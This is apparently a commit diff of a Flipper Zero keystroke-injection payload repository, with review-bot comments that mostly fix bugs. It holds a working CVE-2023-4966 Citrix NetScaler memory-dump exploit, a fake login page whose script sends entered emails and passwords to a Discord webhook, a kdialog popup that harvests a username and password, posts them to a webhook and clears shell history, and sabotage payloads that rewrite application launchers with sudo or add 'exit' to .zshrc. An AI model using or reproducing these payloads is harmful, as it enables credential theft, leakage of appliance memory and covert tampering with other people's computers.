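Review bot: the front matter says **Category**: incident-response, but the title and first paragraph describe an exploitation proof of concept; label it as such so the repository categories stay meaningful. In the Windows section `$headers` is first explained and defined as the string `"-H 'Host:$header_value'"` and then redefined two lines later as a hashtable with a contradictory explanation; `Invoke-RestMethod -Headers` takes a dictionary, so the string definition and its paragraph should be removed. The Linux section's `curl` line uses `$hostname` while the payload.txt in this commit uses the `#HOSTNAME` placeholder (the `$hostname` form is script.sh's); state which file each snippet is taken from. The index entry `#duckyScript-extensions-used` points to a section that does not exist in this README, and the index says "Script.sh" where the heading reads "Script sh".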
Binary file not shown.
Width:  |  Height:  |  Size: 61 KiB
@@ -0,0 +1,48 @@
REM ####################################################################################
REM # #
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : incident-response #
REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
REM # #
REM ####################################################################################
REM GNU/Linux Version
DELAY 3000
CTRL-ALT t
DELAY 1000
STRING header_value=$(yes a | head -n 24576 | tr -d '\n')
ENTER
DELAY 500
STRING headers="-H 'Host:$header_value'"
ENTER
DELAY 500
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
STRING response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
ENTER
DELAY 500
STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
ENTER
DELAY 500
STRING echo "--- Dumped memory ---"
ENTER
DELAY 500
STRING echo "$response" | cut -c 131051-
ENTER
DELAY 500
STRING echo "--- End ---"
ENTER
DELAY 500
STRING else
ENTER
DELAY 500
STRING echo "Could not dump memory"
ENTER
DELAY 500
STRING fi
ENTER
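Review bot: the header block says `Target : Citrix NetScaler ADV`, which should be `ADC` as used in the title and throughout the README, and `Category : incident-response` does not describe an exploitation proof of concept; both should match the README once it is corrected.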
@@ -0,0 +1,17 @@
#!/bin/bash
hostname="$1" # first parameter
header_value=$(yes a | head -n 24576 | tr -d '\n')
headers="-H 'Host:$header_value'"
response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
echo "--- Dumped memory ---"
echo "$response" | cut -c 131051-
echo "--- End ---"
else
echo "Could not dump memory"
fi
@@ -0,0 +1,51 @@
# Standard Phishing Attack - Linux ✅
A script used to exfiltrate the Standard username and password by a phishing attack.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Phishing
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate the Standard username and password by a phishing attack.
Opens a shell, create a tmp directory that will be deleted in 3600 seconds, move into the directory, download your own zip, unzip it, open the login page and close the shell.
## Getting Started
### Dependencies
* Internet Connection
### Settings
* Set the Discord wehbook (or whatever you want) into the login.js file at line 3
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
@@ -0,0 +1,34 @@
<!DOCTYPE html>
<html>
<head>
<title>Form di Login con Bootstrap</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
<h2>Special and super secure login</h2>
<form onsubmit="send_login(); return false;" method="post">
<div class="form-group">
<label for="email">Email:</label>
<input type="email" class="form-control" id="email" placeholder="Insert your email">
</div>
<div class="form-group">
<label for="password">Password:</label>
<input type="password" class="form-control" id="password" placeholder="Insert your password">
</div>
<div class="form-check">
<label class="form-check-label">
<input type="checkbox" class="form-check-input"> Remember me
</label>
</div>
<button type="submit" class="btn btn-primary">Login</button>
</form>
</div>
</body>
<script src="script.js"></script>
</html>
@@ -0,0 +1,56 @@
REM ###########################################
REM # |
REM # Title : Standard Phishing Attack |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Phishing |
REM # Target : Linux |
REM # |
REM ###########################################
REM Requirements:
REM - Internet Connection
REM REQUIRED - Replace example.com/file.zip with your own ZIP link. The zip should contian the files ['login.html', 'script.js']
DEFINE ZIP_LINK example.com/file.zip
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Main SECTION ####
REM Create a random directory
STRING dir_name=$(mktemp -d)
ENTER
DELAY 500
REM Delete the directory after 60 minutes (3600 seconds)
STRING (sleep 3600 && rm -rf $dir_name) &
ENTER
DELAY 500
REM Move into the directory
STRING cd $dir_name
ENTER
DELAY 500
REM Downloa the zip from your own link
STRING curl -LOk "
STRING ZIP_LINK
STRING "
ENTER
DELAY 500
REM Unzip it
STRING unzip file.zip
ENTER
DELAY 500
REM Open the login page
STRING xdg-open login.html; exit;
ENTER
@@ -0,0 +1,32 @@
async function send_login() {
// SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data
const discord_webhook_url = "https://discord.com/api/webhooks/123/abc";
// Retrieve data from POST form
const email = document.getElementById('email').value;
const password = document.getElementById('password').value;
// Create message content
const message = "Email: " + email + " \n " + "Password: " + password;
try {
// Send POST request to Discord webhook URL
const response = await fetch(discord_webhook_url, {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({ content: message })
});
if (response.ok) {
window.location.href = "https://www.example.com";
} else {
// Otherwise, throw a generic error
throw new Error('Generic error!');
}
} catch (error) {
// Log any errors to the console
console.error(error);
}
}
@@ -0,0 +1,89 @@
# Standard Phishing Payload Using kdialog - Linux ✅
A script used to exfiltrate some input by a popup phishing based on linux systems using kdialog.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Phishing
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate some input by a popup phishing based on linux systems using kdialog.
Opens a shell, get the data by a popup, send the input to a Discord webhook (or whatever you want to use for the exfiltration).
## Getting Started
### Dependencies
* Internet Connection for the Exfiltration
### Settings
* Set the Discord webhook
* Set the payload as you want
### cURL Command
With this payload you can send a post message using cURL shell command line to the webhook or whatever you choose for the exfiltration. You should replace the tag *\<message>* with the user input.
- `curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(<message>)\"}" $WEBHOOK_URL);`
### kdialog - Popup command
KDialog can be used to show nice dialog boxes from shell scripts. You can't acquire multiple input in one popup, so you should use multiple popup. You can set the title, the message, the input type and so and so on...
- Simple message popup: `kdialog --title "<replace_with_your_title>" --msgbox "<replace_with_your_message>"; `
- Plaintext input popup (i.e. Username): `kdialog --title "<input_title>" --inputbox "<input_type_title>";`
- Hiddentext input popup (i.e. Password): `kdialog --title "<input_title>" --password "<input_type_title>" --default "password";`
### The Payload
The payload will merge the cURL command with the kdialog popup output (so the user input) as the following command...
```shell
$(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Popup Title" --msgbox "Insert your username and password for go on"; kdialog --title "Insert your Username" --inputbox "Username"; kdialog --title "Insert your Password" --password "Password" --default "password";)\"}" $WEBHOOK_URL);
```
You can put into the payload something that will clear the last shell history closing the shell at the end of the execution, adding this line `history -c; exit;`
```shell
$(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Popup Title" --msgbox "Insert your username and password for go on"; kdialog --title "Insert your Username" --inputbox "Username"; kdialog --title "Insert your Password" --password "Password" --default "password";)\"}" $WEBHOOK_URL); history -c; exit;
```
### FAQs
- Why put the entire payload in one line?
Generally it is recommended to divide the various steps at different times by dividing each command with some DELAY, in this case it is not recommended because phishing-type cyber attacks often tend to take a long time. How can you tell how long a user should take to enter their data? What if he doesn't remember his email? It is important to consider the slow factor, which, in theory, can take really long and in any case cannot be dynamically predicted.
- Why is used the 'cyber-attack' word?
This payload is intended to be a working tool for performing cybersecurity analysis and is not intended to harm malicious users in any way. This term is used for simplicity in speaking but is really meant to be a study tool that can be worked on.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
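Review bot: the command under *cURL Command* is not runnable as written. `$(<message>)` is a command substitution, not a placeholder: the shell tries to execute a command with `<message>` parsed as a redirection, and the trailing `)` before `;` has no matching `(`. Since the tag is meant to be replaced by the user input, write the placeholder as plain `<message>` inside the JSON string and drop the stray `)`. Separately, *The Payload* builds the JSON body by splicing raw kdialog output into a quoted string: the `--inputbox` and `--password` results are joined by a newline, and any `"` or `\` the user types lands unescaped, so for such input the body is invalid JSON and the webhook rejects it. The README should state that limitation instead of presenting the one-liner as working for arbitrary input.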
@@ -0,0 +1,54 @@
REM ##########################################################
REM # |
REM # Title : Standard Phishing Payload Using kdialog |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Phishing |
REM # Target : Linux |
REM # |
REM ##########################################################
REM Requirements:
REM - EXFILTRATION:
REM - Internet Connection
REM - Discord webhook for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Dropbox, Telegram and so on..)
REM - PHISHING:
REM - This payload is usable on the Linux system where is installed 'kdialog', but you can use whatever you want for simulate the popup with the intent to take the input
REM - It is important that the popup payload occurs in a single line so that the traces of data collection are eliminated immediately after submission. This is precisely why you can see the REMed code to get a good understanding of what it is all about.
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE WEBHOOK example.com
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Phishing ####
STRING WEBHOOK_URL="
STRING WEBHOOK
STRING "
ENTER
DELAY 500
REM A short and efficient cURL command to send an HTTP POST request to a webhook URL with JSON data in the request body.
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(
REM A compact command that uses kdialog to display a popup message prompting (into the curl content section) the user to enter their username and password to proceed. You can't acquire multiple input in one popup, so you should use multiple popup, as i wrote here.
REM You can set the title, the message, the input type and so and so on...
STRING kdialog --title "Popup Title" --msgbox "Insert your username and password for go on";
STRING kdialog --title "Insert your Username" --inputbox "Username";
STRING kdialog --title "Insert your Password" --password "Password" --default "password";
REM The end part of the curl payload...
STRING )\"}" $WEBHOOK_URL);
REM history -c will clear the last shell history and the exit command will close the popup at the end of the execution
STRING history -c; exit;
REM All-In-One doesn't need delay time
ENTER
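Review bot: the leading `$(` on `STRING $(curl -H ...` (closed by the `)` on `STRING )\"}" $WEBHOOK_URL);`) wraps the entire curl call in a command substitution, so whatever the webhook returns in its response body is word-split and executed as a shell command on the host; nothing in the payload needs that, and it turns any unexpected response into command execution. Remove that outer `$(` and its `)`. The `REM` header also claims that "traces of data collection are eliminated immediately after submission", but `history -c` is a bash builtin option and the shell-prank READMEs on this page note that Kali defaults to zsh since 2020.4; given `Target : Linux`, the comment should qualify that claim to bash rather than stating it for every distribution.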
@@ -0,0 +1,59 @@
# Change Desktop Wallpaper - Linux/KDE ✅
A script used to prank your friends changing their desktop wallpaper.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Prank
## Disclaimer
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/gif/flipper_zero%20(15).gif?raw=true" width="209" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png?raw=true" width="600" />
</div>
## Description
A script used to prank your friends changing their desktop wallpaper.
Opens a shell, download the image, define the local image path, run a command KDE BASED that will replace the desktop wallpaper with the local image path, then delete the image downloaded, clear the history and close the shell.
## Getting Started
### Dependencies
* Internet Connection
* Linux KDE
### Executing program
* Plug in your device
### Settings
- Image link
- Local image path
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
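Review bot: *Settings* lists "Local image path" without saying where the download ends up. The payload runs `wget` from the freshly opened terminal, so the file is written to the shell's working directory (normally the user's home) under the file name from the URL; the README should say that the path must be `<home>/<IMAGE_NAME>` and match the link, otherwise the `writeConfig("Image", ...)` call points at a file that does not exist. It would also help to state under *Dependencies* that the target is a Plasma session, since `qdbus org.kde.plasmashell` is what the script talks to.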
@@ -0,0 +1,41 @@
REM ###########################################
REM # |
REM # Title : Change Desktop Wallpaper |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Linux (KDE based) |
REM # |
REM ###########################################
REM Requirements:
REM - Internet Connection
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Replace 'example.com/IMAGE_NAME' with your image link
STRING wget example.com/IMAGE_NAME
ENTER
REM It depends by the Internet Connection
DELAY 2000
STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", "
REM
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
REM
STRING file://example.jpg
STRING ")}'
ENTER
DELAY 1000
STRING rm -rf
REM
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
REM
STRING file://example.jpg
STRING ;history -c; exit;
ENTER
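Review bot: the cleanup step `rm -rf` followed by `STRING file://example.jpg` cannot remove the download: `rm` takes filesystem paths, not URIs, so it looks for a file literally named `file://example.jpg` (i.e. `example.jpg` below a directory named `file:`) and fails, leaving the image in place. The URI form is only correct for the `d.writeConfig("Image", "...")` argument; the `rm` line needs the plain path, and the second "Replace example.jpg" comment should say so. Prefer `rm -f` over `rm -rf` there as well: `-r` gains nothing for a single file and turns a mistyped path into a recursive delete.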
Binary file not shown. Size: 8.9 MiB
@@ -0,0 +1,105 @@
# Change The App That Will Be Runned
A script used to prank your friends editing the deafault exec operation of desktop files running other app of wich is clicked confusing the user.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Prank
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
![GIF](Change_The_App_That_Will_Be_Runned.gif)
## Description
A script used to prank your friends editing the deafault exec operation of desktop files running other app of wich is clicked confusing the user.
The script will run a shell in wich it will mix 2 application
## Getting Started
### Dependencies
* sudo permissions
* Original desktop file names and exec commands
* The apps must be installed in the target
### Settings
- Set the desktop file name, i.e. for Signal it is `/usr/share/applications/signal-desktop` and the exec command is `/opt/Signal/signal-desktop --no-sandbox %U`
```DuckyScript
DEFINE ORIGINAL_DESKTOP_FILE_NAME_1 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
DEFINE ORIGINAL_DESKTOP_FILE_NAME_2 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
```
### Example
- Config
```DuckyScript
DEFINE ORIGINAL_DESKTOP_FILE_NAME_1 /usr/share/applications/code-oss.desktop
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_1 /usr/lib/code-oss/code-oss --unity-launch %F
DEFINE ORIGINAL_DESKTOP_FILE_NAME_2 firefox-esr.desktop
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_2 /usr/lib/firefox-esr/firefox-esr %u
```
- Content of ORIGINAL_DESKTOP_FILE_NAME_1
```DuckyScript
[Desktop Entry]
Exec=/usr/lib/code-oss/code-oss --unity-launch %F
...
```
- Content of ORIGINAL_DESKTOP_FILE_NAME_2
```DuckyScript
[Desktop Entry]
Exec=Exec=/usr/lib/firefox-esr/firefox-esr %u
...
```
- Result
```Shell
$ cat /usr/share/applications/code-oss.desktop
[Desktop Entry]
Exec=Exec=/usr/lib/firefox-esr/firefox-esr %u
# ...
$ cat /usr/share/applications/firefox-esr.desktop
[Desktop Entry]
Exec=Exec=/usr/lib/code-oss/code-oss --unity-launch %F
# ...
```
![GIF](Change_The_App_That_Will_Be_Runned.gif)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
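Review bot: the *Example* contradicts the payload's `sed` expression. The payload replaces the whole `^Exec=` line with the DEFINE value, so `ORIGINAL_DESKTOP_EXEC_COMMAND_1 /usr/lib/code-oss/code-oss --unity-launch %F` produces a line with no `Exec=` key at all, while the *Result* block shows `Exec=Exec=...`, and the file 2 *Content* block already shows a doubled `Exec=Exec=` that no desktop file has. Decide whether the DEFINE value carries the `Exec=` prefix and make the three blocks agree. Two smaller points: `ORIGINAL_DESKTOP_FILE_NAME_2 firefox-esr.desktop` lacks the `/usr/share/applications/` prefix that FILE_NAME_1 has, so `sed -i` would look for it in the shell's working directory; and the Signal example gives `/usr/share/applications/signal-desktop` without the `.desktop` suffix that the payload's own `REM` comment uses.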
@@ -0,0 +1,46 @@
REM #######################################################
REM # |
REM # Title : Change The App That Will Be Runned |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : GNU/Linux (Debian based tested) |
REM # |
REM #######################################################
REM Requirements:
REM - sudo permissions
REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
DEFINE ORIGINAL_DESKTOP_FILE_NAME_1 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
DEFINE ORIGINAL_DESKTOP_FILE_NAME_2 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
REM sudo permissions needed
DEFINE SUDO example
REM Open a shell
DELAY 2000
CTRL-ALT t
DELAY 1000
STRING sudo sed -i '/^Exec=/s/.*/
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_2
STRING /'
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_1
DELAY 500
STRING SUDO
ENTER
DELAY 4000
STRING sudo sed -i '/^Exec=/s/.*/
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_1
STRING /'
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_2
DELAY 1000
ALT f4
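Review bot: `STRING sudo sed -i '/^Exec=/s/.*/` + `STRING ORIGINAL_DESKTOP_EXEC_COMMAND_2` + `STRING /'` uses `/` as the substitution delimiter, but every Exec value shown in the README (`/usr/lib/code-oss/code-oss ...`, `/opt/Signal/signal-desktop ...`) contains slashes, so sed reads the first `/` of the path as the end of the replacement and exits with "unknown option to `s'"; neither file is modified. Use a delimiter that cannot occur in a path (for example `s|.*|...|`) or escape the value before typing it. The `REM` header should also record two assumptions the script makes silently: `DEFINE SUDO example` is typed in clear via `STRING SUDO` after a fixed `DELAY 500` with no check that the password prompt is up, and the second `sudo` relies on the credential cache still being valid after `DELAY 4000`. Minor: `ALT f4` is lowercase here while the other payloads write `ALT F4`.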
@@ -0,0 +1,59 @@
# Send Telegram Messages - Linux
A script used to prank your friends sending messages by using Telegram app.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Prank
## Disclaimer
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/gif/flipper_zero%20(15).gif?raw=true" width="209" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png?raw=true" width="600" />
</div>
## Description
A script used to prank your friends sending messages by using Telegram app.
Opens a shell, runs the telegram-desktop app, search the user by the id, enter into the chat, write the message(s) and send, then close the app and the shell.
## Getting Started
### Dependencies
* Internet Connection
* telegram-desktop installed and activated
### Executing program
* Plug in your device
### Settings
- Telegram username
- Messages
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
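Review bot: *Settings* lists "Telegram username" and "Messages", but unlike the other payloads in this commit the script has no `DEFINE` for either; the values are the literal `STRING @example` and `STRING example` lines. Say which lines to edit (and that the search needs the leading `@`), or add DEFINEs and reference them. "telegram-desktop installed and activated" presumably means a client that is already logged in; state that plainly, since the flow types into the search box straight after launch.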
@@ -0,0 +1,43 @@
REM #########################################
REM # |
REM # Title : Send Telegram Messages |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Linux |
REM # |
REM #########################################
REM Requirements:
REM - Internet Connection
REM - telegram-desktop installed and activated
DELAY 1000
CTRL-ALT t
DELAY 2000
STRING telegram-desktop
ENTER
REM It depends by the computer...
DELAY 3000
REM Define the message receiver username
STRING @example
ENTER
DELAY 500
REM Define the message(s)
STRING example
ENTER
DELAY 500
REM other messages here...
REM ...
REM ...
REM Closing Telegram App and the Shell
ALT F4
DELAY 500
CTRL c
DELAY 500
ALT F4
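Review bot: after the fixed `DELAY 3000` the script types `@example` and then the message into whatever window has focus, with no step that confirms the search field took focus or that a chat actually opened; if the username has no exact match, `STRING example` is typed into the search field or into the previously open chat, and if a client is already running the launch only raises the existing window and the timing differs. Document that the delays are tuned for a cold start of a logged-in client, and move the username and messages into `DEFINE` lines as the other payloads do. The closing sequence also deserves a clearer comment: the first `ALT F4` goes to the Telegram window, `CTRL c` then interrupts the `telegram-desktop` process that was started in the foreground of the shell, and the second `ALT F4` closes the terminal; if the first `ALT F4` only hides the window to the tray, `CTRL c` is the step that really ends the app.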
Binary file not shown. Size: 1.9 MiB
@@ -0,0 +1,56 @@
# This Damn Shell Doesn't Work, SO SAD! :C
This payload can be used to prank your friends so that when they open their terminal it will close immediately.
**Category**: Prank
![](1.gif)
## Disclaimer
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/gif/flipper_zero%20(15).gif?raw=true" width="209" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png?raw=true" width="600" />
</div>
## Dependencies
* Nothing <3
## Description
The described payload aims to modify the configuration file of the default shell environment in a Linux system, specifically the `.bashrc` file. This file is executed every time a user opens a terminal or a Bash shell session. By inserting the `exit` command as the first line in the `.bashrc` file, it causes the shell to terminate immediately upon opening, preventing the user from executing any further commands or operations within the shell.
However, it's important to note that starting from version 2020.4, Kali Linux has changed its default shell from Bash to Zsh \[1] for users installing this distribution. Consequently, the main configuration file is no longer `.bashrc` but `.zshrc`. Therefore, if the target is a Kali Linux machine with this version or later, it's necessary to modify the `.zshrc` file instead of `.bashrc`.
To use this payload correctly, it is important to choose the correct one based on the target. If the target system is **Kali Linux** and if it is using Zsh as the default shell, the correct payload is [this one here](), otherwise if it is classic linux distributions like **Ubuntu** or **Debian** it is recommended to use [this one here]().
To restore proper shell operation, it will be necessary to edit via a text editor the `.bashrc` or `.zshrc` file by deleting the first line that consists of the command `exit`.
## Read More
- \[1] [Kali Linux 2020.4 switches the default shell from Bash to ZSH
](https://www.bleepingcomputer.com/news/linux/kali-linux-20204-switches-the-default-shell-from-bash-to-zsh/)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
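Review bot: both "[this one here]()" links in the third Description paragraph have empty targets, so the reader cannot reach the Kali and Ubuntu/Debian variants the paragraph tells them to choose between; fill in the two directory links (the payload table in this commit lists both folders). The Description also opens by saying the payload modifies `.bashrc`, but this is the Kali variant whose payload edits `.zshrc`; the first paragraph should name `.zshrc`, or say up front that the text is shared by the two variants.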
@@ -0,0 +1,29 @@
REM ############################################################
REM # #
REM # Title : This damn shell doesn't work, SO SAD! :C #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Prank #
REM # Target : Kali Linux #
REM # #
REM ############################################################
REM Requirements:
REM - Nothing <3
DELAY 1000
CTRL-ALT t
DELAY 2000
STRING echo "exit" > .tmp
ENTER
DELAY 500
STRING cat .zshrc >> .tmp
ENTER
DELAY 500
STRING mv .tmp >> .zshrc
ENTER
DELAY 500
ALT F4
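Review bot: `mv .tmp >> .zshrc` is not a valid move. The shell parses `>> .zshrc` as an append redirection of `mv`'s stdout, so `mv` receives only `.tmp`, fails with "missing destination file operand", `.zshrc` is left unchanged, and `.tmp` (which already holds the `exit` line plus a copy of the old `.zshrc`) stays behind in the home directory; the README's restore instruction to delete the first line of `.zshrc` then has nothing to restore. The intended step is the two-operand form `mv .tmp .zshrc`. The script also assumes the terminal opens in the user's home directory, since every path is relative; state that in the `REM` header.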
Binary file not shown. Size: 1.9 MiB
@@ -0,0 +1,58 @@
# This Damn Shell Doesn't Work, SO SAD! :C
This payload can be used to prank your friends so that when they open their terminal it will close immediately.
**Category**: Prank
*How it works on Kali Linux...*
![](1.gif)
## Disclaimer
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/gif/flipper_zero%20(15).gif?raw=true" width="209" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png?raw=true" width="600" />
</div>
## Dependencies
* Nothing <3
## Description
The described payload aims to modify the configuration file of the default shell environment in a Linux system, specifically the `.bashrc` file. This file is executed every time a user opens a terminal or a Bash shell session. By inserting the `exit` command as the first line in the `.bashrc` file, it causes the shell to terminate immediately upon opening, preventing the user from executing any further commands or operations within the shell.
However, it's important to note that starting from version 2020.4, Kali Linux has changed its default shell from Bash to Zsh \[1] for users installing this distribution. Consequently, the main configuration file is no longer `.bashrc` but `.zshrc`. Therefore, if the target is a Kali Linux machine with this version or later, it's necessary to modify the `.zshrc` file instead of `.bashrc`.
To use this payload correctly, it is important to choose the correct one based on the target. If the target system is **Kali Linux** and if it is using Zsh as the default shell, the correct payload is [this one here](), otherwise if it is classic linux distributions like **Ubuntu** or **Debian** it is recommended to use [this one here]().
To restore proper shell operation, it will be necessary to edit via a text editor the `.bashrc` or `.zshrc` file by deleting the first line that consists of the command `exit`.
## Read More
